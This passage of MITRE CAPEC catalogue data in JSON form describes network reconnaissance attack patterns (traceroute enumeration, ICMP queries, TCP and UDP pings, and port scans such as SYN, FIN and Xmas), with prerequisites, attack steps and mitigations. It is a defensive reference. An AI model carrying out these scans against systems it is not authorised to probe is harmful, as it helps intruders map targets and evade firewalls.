Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"293":{"ID":"293","Name":"Traceroute Route Enumeration","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow the adversary to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP, but as more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"309"}},"Prerequisites":{"Prerequisite":"A network capable of routing the attackers\' packets to the destination network."},"Resources_Required":{"Resource":"A command line version of traceroute or similar tool that performs route enumeration."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 38-41"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Related_Weaknesses"}}},"294":{"ID":"294","Name":"ICMP Address Mask Request","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends an ICMP Type 17 Address Mask Request to gather information about a target\'s networking configuration. ICMP Address Mask Requests are defined by RFC-950, \\"Internet Standard Subnetting Procedure.\\" An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps the adversary plan router-based attacks as well as denial-of-service attacks against the broadcast address. Many modern operating systems will not respond to ICMP type 17 messages for security reasons. Determining whether a system or router will respond to an ICMP Address Mask Request helps the adversary determine operating system or firmware version. Additionally, because these types of messages are rare, they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 17 and egress ICMP type 18 messages.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send an ICMP type 17 query (Address Mask Request) to a remote target and receive an ICMP type 18 message (ICMP Address Mask Reply) in response. Generally, modern operating systems will ignore ICMP type 17 messages, however, routers will commonly respond to this request."},"Resources_Required":{"Resource":"The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Hide Activities"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 53-54"},{"External_Reference_ID":"REF-139"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.7.2 ICMP Probe Selection, pg. 70"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"295":{"ID":"295","Name":"Timestamp Request","Abstraction":"Detailed","Status":"Stable","Description":"This pattern of attack leverages standard requests to learn the exact time associated with a target system. An adversary may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send a timestamp request to a remote target and receive a response."},"Resources_Required":{"Resource":"Scanners or utilities that provide the ability to send custom ICMP queries."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Example_Instances":{"Example":["An adversary sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An adversary can attempt to use an ICMP Timestamp requests to \'ping\' a remote system to see if is alive. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems, many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages.","An adversary may gather the system time or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\\\\\\\hostname to gather the system time on a remote system. The victim\'s time zone may also be inferred from the current system time or gathered by using w32tm /tz. The information could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1124","Entry_Name":"System Time Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 44-51"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-147","Section":"Section 3.7.2 ICMP Probe Selection, pg. 70"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["ICMP Timestamp Request",{"Date":"2018-07-31"}]}},"296":{"ID":"296","Name":"ICMP Information Request","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send an ICMP Type 15 Information Request and receive an ICMP Type 16 Information Reply in response."},"Skills_Required":{"Skill":["The adversary needs to know certain linux commands for this type of attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Scanners or utilities that provide the ability to send custom ICMP queries."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 44-51"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.7.2 ICMP Probe Selection, pg. 70"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"297":{"ID":"297","Name":"TCP ACK Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a TCP segment with the ACK flag set to a remote host for the purpose of determining if the host is alive. This is one of several TCP \'ping\' types. The RFC 793 expected behavior for a service is to respond with a RST \'reset\' packet to any unsolicited ACK segment that is not part of an existing connection. So by sending an ACK segment to a port, the adversary can identify that the host is alive by looking for a RST packet. Typically, a remote server will respond with a RST regardless of whether a port is open or closed. In this way, TCP ACK pings cannot discover the state of a remote port because the behavior is the same in either case. The firewall will look up the ACK packet in its state-table and discard the segment because it does not correspond to any active connection. A TCP ACK Ping can be used to discover if a host is alive via RST response packets sent from the host.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The ability to send an ACK packet to a remote host and identify the response. Creating the ACK packet without building a full connection requires the use of raw sockets. As a result, it is not possible to send a TCP ACK ping from some systems (Windows XP SP 2) without the use of third-party packet drivers like Winpcap. On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket.","The target must employ a stateless firewall that lacks a rule set that rejects unsolicited ACK packets.","The adversary requires the ability to craft custom TCP ACK segments for use during network reconnaissance. Sending an ACK ping requires the ability to access \\"raw sockets\\" in order to create the packets with direct access to the packet header."]},"Resources_Required":{"Resource":"ACK scanning can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Leverage stateful firewalls that allow for the rejection of a packet that is not part of an existing connection."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 49"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 3.6.2 TCP ACK Ping, pg. 61"},{"External_Reference_ID":"REF-125"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"298":{"ID":"298","Name":"UDP Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an \'ICMP port unreachable\' message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The adversary requires the ability to send a UDP datagram to a remote host and receive a response.","The adversary requires the ability to craft custom UDP Packets for use during network reconnaissance.","The target\'s firewall must not be configured to block egress ICMP messages."]},"Resources_Required":{"Resource":"UDP pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Configure your firewall to block egress ICMP messages."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 47"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.6.3 TCP UDP Ping, pg. 63"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"299":{"ID":"299","Name":"TCP SYN Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses TCP SYN packets as a means towards host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN \\"synchronize\\" packet by completing stage two of the \'three-way handshake\' - by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST \\"reset\\" packet. This behavior can be used to \'ping\' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response. Due to the different responses from open and closed ports, SYN packets can be used to determine the remote state of the port. A TCP SYN ping is also useful for discovering alive hosts protected by a stateful firewall. In cases where a specific firewall rule does not block access to a port, a SYN packet can pass through the firewall to the host and solicit a response from either an open or closed port. When a stateful firewall is present, SYN pings are preferable to ACK pings because a stateful firewall will typically drop all unsolicited ACK packets as they are not part of an existing or new connection. TCP SYN pings often fail when a stateless ACL or firewall is configured to blanket-filter incoming packets to a port. The firewall device will discard any SYN packets to a blocked port. Often, an adversary will alternate between SYN and ACK pings to discover if a host is alive.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send a TCP SYN packet to a remote target. Depending upon the operating system, the ability to craft SYN packets may require elevated privileges."},"Skills_Required":{"Skill":["The adversary needs to know how to craft and send protocol commands from the command line or within a tool.",{"Level":"Low"}]},"Resources_Required":{"Resource":"SYN pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 48"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 3.6.2 TCP SYN Ping, pg. 61"},{"External_Reference_ID":"REF-125"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"300":{"ID":"300","Name":"Port Scanning","Abstraction":"Standard","Status":"Stable","Description":"An adversary uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network. Although common services have assigned port numbers, services and applications can run on arbitrary ports. Additionally, port scanning is complicated by the potential for any machine to have up to 65535 possible UDP or TCP services. The goal of port scanning is often broader than identifying open ports, but also give the adversary information concerning the firewall configuration. Depending upon the method of scanning that is used, the process can be stealthy or more obtrusive, the latter being more easily detectable due to the volume of packets involved, anomalous packet traits, or system logging. Typical port scanning activity involves sending probes to a range of ports and observing the responses. There are four port statuses that this type of attack aims to identify: open, closed, filtered, and unfiltered. For strategic purposes it is useful for an adversary to distinguish between an open port that is protected by a filter vs. a closed port that is not protected by a filter. Making these fine grained distinctions is requires certain scan types. Collecting this type of information tells the adversary which ports can be attacked directly, which must be attacked with filter evasion techniques like fragmentation, source port scans, and which ports are unprotected (i.e. not firewalled) but aren\'t hosting a network service. An adversary often combines various techniques in order to gain a more complete picture of the firewall filtering mechanisms in place for a host.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169"}},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target\'s network in order to carry out this type of attack."},"Resources_Required":{"Resource":"The adversary requires a network mapping/scanning tool, or must conduct socket programming on the command line. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1046","Entry_Name":"Network Service Scanning"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 54"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-34","Section":"Section 4.1 Introduction to Port Scanning, pg. 73"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["There are four types of port status that this type of attack aims to identify: 1) Open Port: The port is open and a firewall does not block access to the port, 2) Closed Port: The port is closed (i.e. no service resides there) and a firewall does not block access to the port, 3) Filtered Port: A firewall or ACL rule is blocking access to the port in some manner, although the presence of a listening service on the port cannot be verified, and 4) Unfiltered Port: A firewall or ACL rule is not blocking access to the port, although the presence of a listening service on the port cannot be verified.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes"}]}},"301":{"ID":"301","Name":"TCP Connect Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses full TCP connection attempts to determine if a port is open on the target system. The scanning process involves completing a \'three-way handshake\' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are established and torn down. TCP connect scanning commonly involves establishing a full connection, and then subsequently tearing it down, and therefore involves sending a significant number of packets to each port that is scanned. Compared to other types of scans, a TCP Connect scan is slow and methodical. This type of scanning causes considerable noise in system logs and can be spotted by IDS/IPS systems. TCP Connect scanning can detect when a port is open by completing the three-way handshake, but it cannot distinguish a port that is unfiltered with no service running on it from a port that is filtered by a firewall but contains an active service. Due to the significant volume of packets exchanged per port, TCP connect scanning can become very time consuming (performing a full TCP connect scan against a host can take multiple days). Generally, it is not used as a method for performing a comprehensive port scan, but is reserved for checking a short list of common ports.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary attempts to initialize a TCP connection with with the target port."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the result of their TCP connection to determine the state of the target port. A successful connection indicates a port is open with a service listening on it while a failed connection indicates the port is not open."}]},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network. The TCP connect Scan requires the ability to connect to an available port and complete a \'three-way-handshake\' This scanning technique does not require any special privileges in order to perform. This type of scan works against all TCP/IP stack implementations."},"Resources_Required":{"Resource":"The adversary can leverage a network mapper or scanner, or perform this attack via routine socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network to see the response."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Employ a robust network defense posture that includes an IDS/IPS system."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 54"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.3 TCP Connect Scanning, pg. 100"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"302":{"ID":"302","Name":"TCP FIN Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow the adversary to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed in comparison with other types of scans, the major advantage a TCP FIN Scan is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to \'build\' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with the FIN flag but not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If no response is received the port is open. If a RST packet is received then the port is closed."}]},"Prerequisites":{"Prerequisite":"FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack pattern requires the ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected. An IDS/IPS system with heuristic algorithms is required to detect them."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-147","Section":"Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Mitigations, Notes"}],"Previous_Entry_Name":["TCP FIN scan",{"Date":"2018-07-31"}]}},"303":{"ID":"303","Name":"TCP Xmas Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with all possible flags set in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed when compared with other types of scans, its major advantage is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to \'build\' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with all flags set but not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If no response is received the port is open. If a RST packet is received then the port is closed."}]},"Prerequisites":{"Prerequisite":"The adversary needs logical access to the target network. XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack can be carried out with a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":"Employ a robust network defensive posture that includes a managed IDS/IPS."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["Many operating systems do not implement RFC 793 exactly and for this reason XMAS scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. XMAS scans are limited by the range of platforms against which they work.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required, 